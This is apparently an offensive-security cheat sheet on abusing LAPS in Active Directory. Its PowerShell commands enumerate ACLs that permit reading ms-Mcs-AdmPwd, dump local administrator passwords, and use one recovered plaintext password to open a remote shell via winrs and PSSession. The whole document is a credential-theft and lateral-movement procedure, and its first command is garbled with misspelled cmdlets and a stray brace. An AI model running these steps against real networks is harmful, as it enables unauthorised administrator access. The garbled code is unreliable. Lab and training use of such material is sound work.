LAPS

low-level:

~~~ powershell
# get computers were we have sufficient access rights
PS>  Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} }| For-Each Object {$_ | Add-Mebmer NoteProperty 'IdentityName' $(Convert-SidToNmae $_.SecurityIdentifier); $_}
PS> Get-DomainObject -Identity <targetmachine$> | select -ExpandProperty ms-mcs-admpwd
PS> Get-ADComputer -Identity <targetmachine> -Property ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd

using AdmPwd:

PS> Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS> Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
PS> Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 -Verbose
PS> C:\AD\Tools\Get-LapsPermissions.ps1
PS> Get-AdmPwdPassword -ComputerName us-mailmgmt
PS> winrs -r:us-mailmgmt -u:.\administrator -p:t7HoBF+m]ctv.] cmd
 
# alternatively
PS> $passwd = ConvertTo-SecureString 't7HoBF+m]ctv.]' -AsPlainText -Force
PS> $creds = New-Object System.Management.Automation.PSCredential("us-mailmgmt\administrator", $passwd)
PS> $mailmgmt = New-PSSession -ComputerName us-mailmgmt -Credential $creds